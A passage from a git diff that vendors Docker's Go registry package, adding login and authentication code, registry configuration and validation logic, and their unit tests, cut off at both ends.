!strings.HasPrefix(err.Error(), "Conflict:") { + t.Fatalf("did not get expected error on overwrite attempt - got %v", err) + } + // Repeat to overwrite with force == true + if err = store.AddTag(ref4, testImageID3, true); err != nil { + t.Fatalf("failed to force tag overwrite: %v", err) + } + + // Check references so far + id, err := store.Get(nameOnly) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID1 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String()) + } + + id, err = store.Get(ref1) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID1 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String()) + } + + id, err = store.Get(ref2) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID2 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID2.String()) + } + + id, err = store.Get(ref3) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID1 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID1.String()) + } + + id, err = store.Get(ref4) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID3 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID3.String()) + } + + id, err = store.Get(ref5) + if err != nil { + t.Fatalf("Get returned error: %v", err) + } + if id != testImageID2 { + t.Fatalf("id mismatch: got %s instead of %s", id.String(), testImageID3.String()) + } + + // Get should return ErrDoesNotExist for a nonexistent repo + nonExistRepo, err := ParseNamed("username/nonexistrepo:latest") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if _, err = store.Get(nonExistRepo); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + + // Get should return ErrDoesNotExist for a nonexistent tag + nonExistTag, err := 
ParseNamed("username/repo1:nonexist") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + if _, err = store.Get(nonExistTag); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + + // Check References + refs := store.References(testImageID1) + if len(refs) != 3 { + t.Fatal("unexpected number of references") + } + // Looking for the references in this order verifies that they are + // returned lexically sorted. + if refs[0].String() != ref3.String() { + t.Fatalf("unexpected reference: %v", refs[0].String()) + } + if refs[1].String() != ref1.String() { + t.Fatalf("unexpected reference: %v", refs[1].String()) + } + if refs[2].String() != nameOnly.String()+":latest" { + t.Fatalf("unexpected reference: %v", refs[2].String()) + } + + // Check ReferencesByName + repoName, err := WithName("username/repo1") + if err != nil { + t.Fatalf("could not parse reference: %v", err) + } + associations := store.ReferencesByName(repoName) + if len(associations) != 3 { + t.Fatal("unexpected number of associations") + } + // Looking for the associations in this order verifies that they are + // returned lexically sorted. 
+ if associations[0].Ref.String() != ref3.String() { + t.Fatalf("unexpected reference: %v", associations[0].Ref.String()) + } + if associations[0].ID != testImageID1 { + t.Fatalf("unexpected reference: %v", associations[0].Ref.String()) + } + if associations[1].Ref.String() != ref1.String() { + t.Fatalf("unexpected reference: %v", associations[1].Ref.String()) + } + if associations[1].ID != testImageID1 { + t.Fatalf("unexpected reference: %v", associations[1].Ref.String()) + } + if associations[2].Ref.String() != ref2.String() { + t.Fatalf("unexpected reference: %v", associations[2].Ref.String()) + } + if associations[2].ID != testImageID2 { + t.Fatalf("unexpected reference: %v", associations[2].Ref.String()) + } + + // Delete should return ErrDoesNotExist for a nonexistent repo + if _, err = store.Delete(nonExistRepo); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Delete") + } + + // Delete should return ErrDoesNotExist for a nonexistent tag + if _, err = store.Delete(nonExistTag); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Delete") + } + + // Delete a few references + if deleted, err := store.Delete(ref1); err != nil || deleted != true { + t.Fatal("Delete failed") + } + if _, err := store.Get(ref1); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + if deleted, err := store.Delete(ref5); err != nil || deleted != true { + t.Fatal("Delete failed") + } + if _, err := store.Get(ref5); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } + if deleted, err := store.Delete(nameOnly); err != nil || deleted != true { + t.Fatal("Delete failed") + } + if _, err := store.Get(nameOnly); err != ErrDoesNotExist { + t.Fatal("Expected ErrDoesNotExist from Get") + } +} + +func TestInvalidTags(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "tag-store-test") + defer os.RemoveAll(tmpDir) + + store, err := NewReferenceStore(filepath.Join(tmpDir, "repositories.json")) + if err != nil { + 
t.Fatalf("error creating tag store: %v", err) + } + id := digest.Digest("sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6") + + // sha256 as repo name + ref, err := ParseNamed("sha256:abc") + if err != nil { + t.Fatal(err) + } + err = store.AddTag(ref, id, true) + if err == nil { + t.Fatalf("expected setting tag %q to fail", ref) + } + + // setting digest as a tag + ref, err = ParseNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6") + if err != nil { + t.Fatal(err) + } + err = store.AddTag(ref, id, true) + if err == nil { + t.Fatalf("expected setting digest %q to fail", ref) + } + +} diff --git a/vendor/github.com/docker/docker/registry/auth.go b/vendor/github.com/docker/docker/registry/auth.go new file mode 100644 index 0000000000..8cadd51ba0 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/auth.go @@ -0,0 +1,303 @@ +package registry + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/url" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/distribution/registry/client/auth/challenge" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" +) + +const ( + // AuthClientID is used the ClientID used for the token server + AuthClientID = "docker" +) + +// loginV1 tries to register/login to the v1 registry server. 
+func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent string) (string, string, error) { + registryEndpoint, err := apiEndpoint.ToV1Endpoint(userAgent, nil) + if err != nil { + return "", "", err + } + + serverAddress := registryEndpoint.String() + + logrus.Debugf("attempting v1 login to registry endpoint %s", serverAddress) + + if serverAddress == "" { + return "", "", fmt.Errorf("Server Error: Server Address not set.") + } + + loginAgainstOfficialIndex := serverAddress == IndexServer + + req, err := http.NewRequest("GET", serverAddress+"users/", nil) + if err != nil { + return "", "", err + } + req.SetBasicAuth(authConfig.Username, authConfig.Password) + resp, err := registryEndpoint.client.Do(req) + if err != nil { + // fallback when request could not be completed + return "", "", fallbackError{ + err: err, + } + } + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + return "", "", err + } + if resp.StatusCode == http.StatusOK { + return "Login Succeeded", "", nil + } else if resp.StatusCode == http.StatusUnauthorized { + if loginAgainstOfficialIndex { + return "", "", fmt.Errorf("Wrong login/password, please try again. Haven't got a Docker ID? Create one at https://hub.docker.com") + } + return "", "", fmt.Errorf("Wrong login/password, please try again") + } else if resp.StatusCode == http.StatusForbidden { + if loginAgainstOfficialIndex { + return "", "", fmt.Errorf("Login: Account is not active. Please check your e-mail for a confirmation link.") + } + // *TODO: Use registry configuration to determine what this says, if anything? + return "", "", fmt.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress) + } else if resp.StatusCode == http.StatusInternalServerError { // Issue #14326 + logrus.Errorf("%s returned status code %d. 
Response Body :\n%s", req.URL.String(), resp.StatusCode, body) + return "", "", fmt.Errorf("Internal Server Error") + } + return "", "", fmt.Errorf("Login: %s (Code: %d; Headers: %s)", body, + resp.StatusCode, resp.Header) +} + +type loginCredentialStore struct { + authConfig *types.AuthConfig +} + +func (lcs loginCredentialStore) Basic(*url.URL) (string, string) { + return lcs.authConfig.Username, lcs.authConfig.Password +} + +func (lcs loginCredentialStore) RefreshToken(*url.URL, string) string { + return lcs.authConfig.IdentityToken +} + +func (lcs loginCredentialStore) SetRefreshToken(u *url.URL, service, token string) { + lcs.authConfig.IdentityToken = token +} + +type staticCredentialStore struct { + auth *types.AuthConfig +} + +// NewStaticCredentialStore returns a credential store +// which always returns the same credential values. +func NewStaticCredentialStore(auth *types.AuthConfig) auth.CredentialStore { + return staticCredentialStore{ + auth: auth, + } +} + +func (scs staticCredentialStore) Basic(*url.URL) (string, string) { + if scs.auth == nil { + return "", "" + } + return scs.auth.Username, scs.auth.Password +} + +func (scs staticCredentialStore) RefreshToken(*url.URL, string) string { + if scs.auth == nil { + return "" + } + return scs.auth.IdentityToken +} + +func (scs staticCredentialStore) SetRefreshToken(*url.URL, string, string) { +} + +type fallbackError struct { + err error +} + +func (err fallbackError) Error() string { + return err.err.Error() +} + +// loginV2 tries to login to the v2 registry server. The given registry +// endpoint will be pinged to get authorization challenges. These challenges +// will be used to authenticate against the registry to validate credentials. 
+func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent string) (string, string, error) { + logrus.Debugf("attempting v2 login to registry endpoint %s", strings.TrimRight(endpoint.URL.String(), "/")+"/v2/") + + modifiers := DockerHeaders(userAgent, nil) + authTransport := transport.NewTransport(NewTransport(endpoint.TLSConfig), modifiers...) + + credentialAuthConfig := *authConfig + creds := loginCredentialStore{ + authConfig: &credentialAuthConfig, + } + + loginClient, foundV2, err := v2AuthHTTPClient(endpoint.URL, authTransport, modifiers, creds, nil) + if err != nil { + return "", "", err + } + + endpointStr := strings.TrimRight(endpoint.URL.String(), "/") + "/v2/" + req, err := http.NewRequest("GET", endpointStr, nil) + if err != nil { + if !foundV2 { + err = fallbackError{err: err} + } + return "", "", err + } + + resp, err := loginClient.Do(req) + if err != nil { + if !foundV2 { + err = fallbackError{err: err} + } + return "", "", err + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + // TODO(dmcgowan): Attempt to further interpret result, status code and error code string + err := fmt.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode)) + if !foundV2 { + err = fallbackError{err: err} + } + return "", "", err + } + + return "Login Succeeded", credentialAuthConfig.IdentityToken, nil + +} + +func v2AuthHTTPClient(endpoint *url.URL, authTransport http.RoundTripper, modifiers []transport.RequestModifier, creds auth.CredentialStore, scopes []auth.Scope) (*http.Client, bool, error) { + challengeManager, foundV2, err := PingV2Registry(endpoint, authTransport) + if err != nil { + if !foundV2 { + err = fallbackError{err: err} + } + return nil, foundV2, err + } + + tokenHandlerOptions := auth.TokenHandlerOptions{ + Transport: authTransport, + Credentials: creds, + OfflineAccess: true, + ClientID: AuthClientID, + Scopes: scopes, + } + tokenHandler := 
auth.NewTokenHandlerWithOptions(tokenHandlerOptions) + basicHandler := auth.NewBasicHandler(creds) + modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler)) + tr := transport.NewTransport(authTransport, modifiers...) + + return &http.Client{ + Transport: tr, + Timeout: 15 * time.Second, + }, foundV2, nil + +} + +// ConvertToHostname converts a registry url which has http|https prepended +// to just an hostname. +func ConvertToHostname(url string) string { + stripped := url + if strings.HasPrefix(url, "http://") { + stripped = strings.TrimPrefix(url, "http://") + } else if strings.HasPrefix(url, "https://") { + stripped = strings.TrimPrefix(url, "https://") + } + + nameParts := strings.SplitN(stripped, "/", 2) + + return nameParts[0] +} + +// ResolveAuthConfig matches an auth configuration to a server address or a URL +func ResolveAuthConfig(authConfigs map[string]types.AuthConfig, index *registrytypes.IndexInfo) types.AuthConfig { + configKey := GetAuthConfigKey(index) + // First try the happy case + if c, found := authConfigs[configKey]; found || index.Official { + return c + } + + // Maybe they have a legacy config file, we will iterate the keys converting + // them to the new format and testing + for registry, ac := range authConfigs { + if configKey == ConvertToHostname(registry) { + return ac + } + } + + // When all else fails, return an empty auth config + return types.AuthConfig{} +} + +// PingResponseError is used when the response from a ping +// was received but invalid. +type PingResponseError struct { + Err error +} + +func (err PingResponseError) Error() string { + return err.Err.Error() +} + +// PingV2Registry attempts to ping a v2 registry and on success return a +// challenge manager for the supported authentication types and +// whether v2 was confirmed by the response. If a response is received but +// cannot be interpreted a PingResponseError will be returned. 
+func PingV2Registry(endpoint *url.URL, transport http.RoundTripper) (challenge.Manager, bool, error) { + var ( + foundV2 = false + v2Version = auth.APIVersion{ + Type: "registry", + Version: "2.0", + } + ) + + pingClient := &http.Client{ + Transport: transport, + Timeout: 15 * time.Second, + } + endpointStr := strings.TrimRight(endpoint.String(), "/") + "/v2/" + req, err := http.NewRequest("GET", endpointStr, nil) + if err != nil { + return nil, false, err + } + resp, err := pingClient.Do(req) + if err != nil { + return nil, false, err + } + defer resp.Body.Close() + + versions := auth.APIVersions(resp, DefaultRegistryVersionHeader) + for _, pingVersion := range versions { + if pingVersion == v2Version { + // The version header indicates we're definitely + // talking to a v2 registry. So don't allow future + // fallbacks to the v1 protocol. + + foundV2 = true + break + } + } + + challengeManager := challenge.NewSimpleManager() + if err := challengeManager.AddResponse(resp); err != nil { + return nil, foundV2, PingResponseError{ + Err: err, + } + } + + return challengeManager, foundV2, nil +} diff --git a/vendor/github.com/docker/docker/registry/auth_test.go b/vendor/github.com/docker/docker/registry/auth_test.go new file mode 100644 index 0000000000..9ab71aa4fb --- /dev/null +++ b/vendor/github.com/docker/docker/registry/auth_test.go @@ -0,0 +1,124 @@ +// +build !solaris + +// TODO: Support Solaris + +package registry + +import ( + "testing" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" +) + +func buildAuthConfigs() map[string]types.AuthConfig { + authConfigs := map[string]types.AuthConfig{} + + for _, registry := range []string{"testIndex", IndexServer} { + authConfigs[registry] = types.AuthConfig{ + Username: "docker-user", + Password: "docker-pass", + } + } + + return authConfigs +} + +func TestSameAuthDataPostSave(t *testing.T) { + authConfigs := buildAuthConfigs() + authConfig := 
authConfigs["testIndex"] + if authConfig.Username != "docker-user" { + t.Fail() + } + if authConfig.Password != "docker-pass" { + t.Fail() + } + if authConfig.Auth != "" { + t.Fail() + } +} + +func TestResolveAuthConfigIndexServer(t *testing.T) { + authConfigs := buildAuthConfigs() + indexConfig := authConfigs[IndexServer] + + officialIndex := ®istrytypes.IndexInfo{ + Official: true, + } + privateIndex := ®istrytypes.IndexInfo{ + Official: false, + } + + resolved := ResolveAuthConfig(authConfigs, officialIndex) + assertEqual(t, resolved, indexConfig, "Expected ResolveAuthConfig to return IndexServer") + + resolved = ResolveAuthConfig(authConfigs, privateIndex) + assertNotEqual(t, resolved, indexConfig, "Expected ResolveAuthConfig to not return IndexServer") +} + +func TestResolveAuthConfigFullURL(t *testing.T) { + authConfigs := buildAuthConfigs() + + registryAuth := types.AuthConfig{ + Username: "foo-user", + Password: "foo-pass", + } + localAuth := types.AuthConfig{ + Username: "bar-user", + Password: "bar-pass", + } + officialAuth := types.AuthConfig{ + Username: "baz-user", + Password: "baz-pass", + } + authConfigs[IndexServer] = officialAuth + + expectedAuths := map[string]types.AuthConfig{ + "registry.example.com": registryAuth, + "localhost:8000": localAuth, + "registry.com": localAuth, + } + + validRegistries := map[string][]string{ + "registry.example.com": { + "https://registry.example.com/v1/", + "http://registry.example.com/v1/", + "registry.example.com", + "registry.example.com/v1/", + }, + "localhost:8000": { + "https://localhost:8000/v1/", + "http://localhost:8000/v1/", + "localhost:8000", + "localhost:8000/v1/", + }, + "registry.com": { + "https://registry.com/v1/", + "http://registry.com/v1/", + "registry.com", + "registry.com/v1/", + }, + } + + for configKey, registries := range validRegistries { + configured, ok := expectedAuths[configKey] + if !ok { + t.Fail() + } + index := ®istrytypes.IndexInfo{ + Name: configKey, + } + for _, registry := 
range registries { + authConfigs[registry] = configured + resolved := ResolveAuthConfig(authConfigs, index) + if resolved.Username != configured.Username || resolved.Password != configured.Password { + t.Errorf("%s -> %v != %v\n", registry, resolved, configured) + } + delete(authConfigs, registry) + resolved = ResolveAuthConfig(authConfigs, index) + if resolved.Username == configured.Username || resolved.Password == configured.Password { + t.Errorf("%s -> %v == %v\n", registry, resolved, configured) + } + } + } +} diff --git a/vendor/github.com/docker/docker/registry/config.go b/vendor/github.com/docker/docker/registry/config.go new file mode 100644 index 0000000000..9a4f6a9251 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config.go @@ -0,0 +1,305 @@ +package registry + +import ( + "errors" + "fmt" + "net" + "net/url" + "strings" + + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/opts" + "github.com/docker/docker/reference" + "github.com/spf13/pflag" +) + +// ServiceOptions holds command line options. +type ServiceOptions struct { + Mirrors []string `json:"registry-mirrors,omitempty"` + InsecureRegistries []string `json:"insecure-registries,omitempty"` + + // V2Only controls access to legacy registries. If it is set to true via the + // command line flag the daemon will not attempt to contact v1 legacy registries + V2Only bool `json:"disable-legacy-registry,omitempty"` +} + +// serviceConfig holds daemon configuration for the registry service. 
+type serviceConfig struct { + registrytypes.ServiceConfig + V2Only bool +} + +var ( + // DefaultNamespace is the default namespace + DefaultNamespace = "docker.io" + // DefaultRegistryVersionHeader is the name of the default HTTP header + // that carries Registry version info + DefaultRegistryVersionHeader = "Docker-Distribution-Api-Version" + + // IndexHostname is the index hostname + IndexHostname = "index.docker.io" + // IndexServer is used for user auth and image search + IndexServer = "https://" + IndexHostname + "/v1/" + // IndexName is the name of the index + IndexName = "docker.io" + + // NotaryServer is the endpoint serving the Notary trust server + NotaryServer = "https://notary.docker.io" + + // DefaultV2Registry is the URI of the default v2 registry + DefaultV2Registry = &url.URL{ + Scheme: "https", + Host: "registry-1.docker.io", + } +) + +var ( + // ErrInvalidRepositoryName is an error returned if the repository name did + // not have the correct form + ErrInvalidRepositoryName = errors.New("Invalid repository name (ex: \"registry.domain.tld/myrepos\")") + + emptyServiceConfig = newServiceConfig(ServiceOptions{}) +) + +// for mocking in unit tests +var lookupIP = net.LookupIP + +// InstallCliFlags adds command-line options to the top-level flag parser for +// the current process. 
+func (options *ServiceOptions) InstallCliFlags(flags *pflag.FlagSet) { + mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, ValidateMirror) + insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, ValidateIndexName) + + flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror") + flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication") + + options.installCliPlatformFlags(flags) +} + +// newServiceConfig returns a new instance of ServiceConfig +func newServiceConfig(options ServiceOptions) *serviceConfig { + config := &serviceConfig{ + ServiceConfig: registrytypes.ServiceConfig{ + InsecureRegistryCIDRs: make([]*registrytypes.NetIPNet, 0), + IndexConfigs: make(map[string]*registrytypes.IndexInfo, 0), + // Hack: Bypass setting the mirrors to IndexConfigs since they are going away + // and Mirrors are only for the official registry anyways. + Mirrors: options.Mirrors, + }, + V2Only: options.V2Only, + } + + config.LoadInsecureRegistries(options.InsecureRegistries) + + return config +} + +// LoadInsecureRegistries loads insecure registries to config +func (config *serviceConfig) LoadInsecureRegistries(registries []string) error { + // Localhost is by default considered as an insecure registry + // This is a stop-gap for people who are running a private registry on localhost (especially on Boot2docker). + // + // TODO: should we deprecate this once it is easier for people to set up a TLS registry or change + // daemon flags on boot2docker? + registries = append(registries, "127.0.0.0/8") + + // Store original InsecureRegistryCIDRs and IndexConfigs + // Clean InsecureRegistryCIDRs and IndexConfigs in config, as passed registries has all insecure registry info. 
+ originalCIDRs := config.ServiceConfig.InsecureRegistryCIDRs + originalIndexInfos := config.ServiceConfig.IndexConfigs + + config.ServiceConfig.InsecureRegistryCIDRs = make([]*registrytypes.NetIPNet, 0) + config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo, 0) + +skip: + for _, r := range registries { + // validate insecure registry + if _, err := ValidateIndexName(r); err != nil { + // before returning err, roll back to original data + config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs + config.ServiceConfig.IndexConfigs = originalIndexInfos + return err + } + // Check if CIDR was passed to --insecure-registry + _, ipnet, err := net.ParseCIDR(r) + if err == nil { + // Valid CIDR. If ipnet is already in config.InsecureRegistryCIDRs, skip. + data := (*registrytypes.NetIPNet)(ipnet) + for _, value := range config.InsecureRegistryCIDRs { + if value.IP.String() == data.IP.String() && value.Mask.String() == data.Mask.String() { + continue skip + } + } + // ipnet is not found, add it in config.InsecureRegistryCIDRs + config.InsecureRegistryCIDRs = append(config.InsecureRegistryCIDRs, data) + + } else { + // Assume `host:port` if not CIDR. + config.IndexConfigs[r] = ®istrytypes.IndexInfo{ + Name: r, + Mirrors: make([]string, 0), + Secure: false, + Official: false, + } + } + } + + // Configure public registry. + config.IndexConfigs[IndexName] = ®istrytypes.IndexInfo{ + Name: IndexName, + Mirrors: config.Mirrors, + Secure: true, + Official: true, + } + + return nil +} + +// isSecureIndex returns false if the provided indexName is part of the list of insecure registries +// Insecure registries accept HTTP and/or accept HTTPS with certificates from unknown CAs. +// +// The list of insecure registries can contain an element with CIDR notation to specify a whole subnet. +// If the subnet contains one of the IPs of the registry specified by indexName, the latter is considered +// insecure. 
+// +// indexName should be a URL.Host (`host:port` or `host`) where the `host` part can be either a domain name +// or an IP address. If it is a domain name, then it will be resolved in order to check if the IP is contained +// in a subnet. If the resolving is not successful, isSecureIndex will only try to match hostname to any element +// of insecureRegistries. +func isSecureIndex(config *serviceConfig, indexName string) bool { + // Check for configured index, first. This is needed in case isSecureIndex + // is called from anything besides newIndexInfo, in order to honor per-index configurations. + if index, ok := config.IndexConfigs[indexName]; ok { + return index.Secure + } + + host, _, err := net.SplitHostPort(indexName) + if err != nil { + // assume indexName is of the form `host` without the port and go on. + host = indexName + } + + addrs, err := lookupIP(host) + if err != nil { + ip := net.ParseIP(host) + if ip != nil { + addrs = []net.IP{ip} + } + + // if ip == nil, then `host` is neither an IP nor it could be looked up, + // either because the index is unreachable, or because the index is behind an HTTP proxy. + // So, len(addrs) == 0 and we're not aborting. + } + + // Try CIDR notation only if addrs has any elements, i.e. if `host`'s IP could be determined. 
+ for _, addr := range addrs { + for _, ipnet := range config.InsecureRegistryCIDRs { + // check if the addr falls in the subnet + if (*net.IPNet)(ipnet).Contains(addr) { + return false + } + } + } + + return true +} + +// ValidateMirror validates an HTTP(S) registry mirror +func ValidateMirror(val string) (string, error) { + uri, err := url.Parse(val) + if err != nil { + return "", fmt.Errorf("%s is not a valid URI", val) + } + + if uri.Scheme != "http" && uri.Scheme != "https" { + return "", fmt.Errorf("Unsupported scheme %s", uri.Scheme) + } + + if uri.Path != "" || uri.RawQuery != "" || uri.Fragment != "" { + return "", fmt.Errorf("Unsupported path/query/fragment at end of the URI") + } + + return fmt.Sprintf("%s://%s/", uri.Scheme, uri.Host), nil +} + +// ValidateIndexName validates an index name. +func ValidateIndexName(val string) (string, error) { + if val == reference.LegacyDefaultHostname { + val = reference.DefaultHostname + } + if strings.HasPrefix(val, "-") || strings.HasSuffix(val, "-") { + return "", fmt.Errorf("Invalid index name (%s). Cannot begin or end with a hyphen.", val) + } + return val, nil +} + +func validateNoScheme(reposName string) error { + if strings.Contains(reposName, "://") { + // It cannot contain a scheme! + return ErrInvalidRepositoryName + } + return nil +} + +// newIndexInfo returns IndexInfo configuration from indexName +func newIndexInfo(config *serviceConfig, indexName string) (*registrytypes.IndexInfo, error) { + var err error + indexName, err = ValidateIndexName(indexName) + if err != nil { + return nil, err + } + + // Return any configured index info, first. + if index, ok := config.IndexConfigs[indexName]; ok { + return index, nil + } + + // Construct a non-configured index info. 
+ index := ®istrytypes.IndexInfo{ + Name: indexName, + Mirrors: make([]string, 0), + Official: false, + } + index.Secure = isSecureIndex(config, indexName) + return index, nil +} + +// GetAuthConfigKey special-cases using the full index address of the official +// index as the AuthConfig key, and uses the (host)name[:port] for private indexes. +func GetAuthConfigKey(index *registrytypes.IndexInfo) string { + if index.Official { + return IndexServer + } + return index.Name +} + +// newRepositoryInfo validates and breaks down a repository name into a RepositoryInfo +func newRepositoryInfo(config *serviceConfig, name reference.Named) (*RepositoryInfo, error) { + index, err := newIndexInfo(config, name.Hostname()) + if err != nil { + return nil, err + } + official := !strings.ContainsRune(name.Name(), '/') + return &RepositoryInfo{ + Named: name, + Index: index, + Official: official, + }, nil +} + +// ParseRepositoryInfo performs the breakdown of a repository name into a RepositoryInfo, but +// lacks registry configuration. +func ParseRepositoryInfo(reposName reference.Named) (*RepositoryInfo, error) { + return newRepositoryInfo(emptyServiceConfig, reposName) +} + +// ParseSearchIndexInfo will use repository name to get back an indexInfo. 
+func ParseSearchIndexInfo(reposName string) (*registrytypes.IndexInfo, error) { + indexName, _ := splitReposSearchTerm(reposName) + + indexInfo, err := newIndexInfo(emptyServiceConfig, indexName) + if err != nil { + return nil, err + } + return indexInfo, nil +} diff --git a/vendor/github.com/docker/docker/registry/config_test.go b/vendor/github.com/docker/docker/registry/config_test.go new file mode 100644 index 0000000000..25578a7f2b --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config_test.go @@ -0,0 +1,49 @@ +package registry + +import ( + "testing" +) + +func TestValidateMirror(t *testing.T) { + valid := []string{ + "http://mirror-1.com", + "https://mirror-1.com", + "http://localhost", + "https://localhost", + "http://localhost:5000", + "https://localhost:5000", + "http://127.0.0.1", + "https://127.0.0.1", + "http://127.0.0.1:5000", + "https://127.0.0.1:5000", + } + + invalid := []string{ + "!invalid!://%as%", + "ftp://mirror-1.com", + "http://mirror-1.com/", + "http://mirror-1.com/?q=foo", + "http://mirror-1.com/v1/", + "http://mirror-1.com/v1/?q=foo", + "http://mirror-1.com/v1/?q=foo#frag", + "http://mirror-1.com?q=foo", + "https://mirror-1.com#frag", + "https://mirror-1.com/", + "https://mirror-1.com/#frag", + "https://mirror-1.com/v1/", + "https://mirror-1.com/v1/#", + "https://mirror-1.com?q", + } + + for _, address := range valid { + if ret, err := ValidateMirror(address); err != nil || ret == "" { + t.Errorf("ValidateMirror(`"+address+"`) got %s %s", ret, err) + } + } + + for _, address := range invalid { + if ret, err := ValidateMirror(address); err == nil || ret != "" { + t.Errorf("ValidateMirror(`"+address+"`) got %s %s", ret, err) + } + } +} diff --git a/vendor/github.com/docker/docker/registry/config_unix.go b/vendor/github.com/docker/docker/registry/config_unix.go new file mode 100644 index 0000000000..d692e8ef50 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config_unix.go @@ -0,0 +1,25 @@ +// +build !windows + 
+package registry + +import ( + "github.com/spf13/pflag" +) + +var ( + // CertsDir is the directory where certificates are stored + CertsDir = "/etc/docker/certs.d" +) + +// cleanPath is used to ensure that a directory name is valid on the target +// platform. It will be passed in something *similar* to a URL such as +// https:/index.docker.io/v1. Not all platforms support directory names +// which contain those characters (such as : on Windows) +func cleanPath(s string) string { + return s +} + +// installCliPlatformFlags handles any platform specific flags for the service. +func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { + flags.BoolVar(&options.V2Only, "disable-legacy-registry", false, "Disable contacting legacy registries") +} diff --git a/vendor/github.com/docker/docker/registry/config_windows.go b/vendor/github.com/docker/docker/registry/config_windows.go new file mode 100644 index 0000000000..d1b313dc1e --- /dev/null +++ b/vendor/github.com/docker/docker/registry/config_windows.go @@ -0,0 +1,25 @@ +package registry + +import ( + "os" + "path/filepath" + "strings" + + "github.com/spf13/pflag" +) + +// CertsDir is the directory where certificates are stored +var CertsDir = os.Getenv("programdata") + `\docker\certs.d` + +// cleanPath is used to ensure that a directory name is valid on the target +// platform. It will be passed in something *similar* to a URL such as +// https:\index.docker.io\v1. Not all platforms support directory names +// which contain those characters (such as : on Windows) +func cleanPath(s string) string { + return filepath.FromSlash(strings.Replace(s, ":", "", -1)) +} + +// installCliPlatformFlags handles any platform specific flags for the service. +func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { + // No Windows specific flags. 
+} diff --git a/vendor/github.com/docker/docker/registry/endpoint_test.go b/vendor/github.com/docker/docker/registry/endpoint_test.go new file mode 100644 index 0000000000..8451d3f678 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/endpoint_test.go @@ -0,0 +1,78 @@ +package registry + +import ( + "net/http" + "net/http/httptest" + "net/url" + "testing" +) + +func TestEndpointParse(t *testing.T) { + testData := []struct { + str string + expected string + }{ + {IndexServer, IndexServer}, + {"http://0.0.0.0:5000/v1/", "http://0.0.0.0:5000/v1/"}, + {"http://0.0.0.0:5000", "http://0.0.0.0:5000/v1/"}, + {"0.0.0.0:5000", "https://0.0.0.0:5000/v1/"}, + {"http://0.0.0.0:5000/nonversion/", "http://0.0.0.0:5000/nonversion/v1/"}, + {"http://0.0.0.0:5000/v0/", "http://0.0.0.0:5000/v0/v1/"}, + } + for _, td := range testData { + e, err := newV1EndpointFromStr(td.str, nil, "", nil) + if err != nil { + t.Errorf("%q: %s", td.str, err) + } + if e == nil { + t.Logf("something's fishy, endpoint for %q is nil", td.str) + continue + } + if e.String() != td.expected { + t.Errorf("expected %q, got %q", td.expected, e.String()) + } + } +} + +func TestEndpointParseInvalid(t *testing.T) { + testData := []string{ + "http://0.0.0.0:5000/v2/", + } + for _, td := range testData { + e, err := newV1EndpointFromStr(td, nil, "", nil) + if err == nil { + t.Errorf("expected error parsing %q: parsed as %q", td, e) + } + } +} + +// Ensure that a registry endpoint that responds with a 401 only is determined +// to be a valid v1 registry endpoint +func TestValidateEndpoint(t *testing.T) { + requireBasicAuthHandler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Add("WWW-Authenticate", `Basic realm="localhost"`) + w.WriteHeader(http.StatusUnauthorized) + }) + + // Make a test server which should validate as a v1 server. 
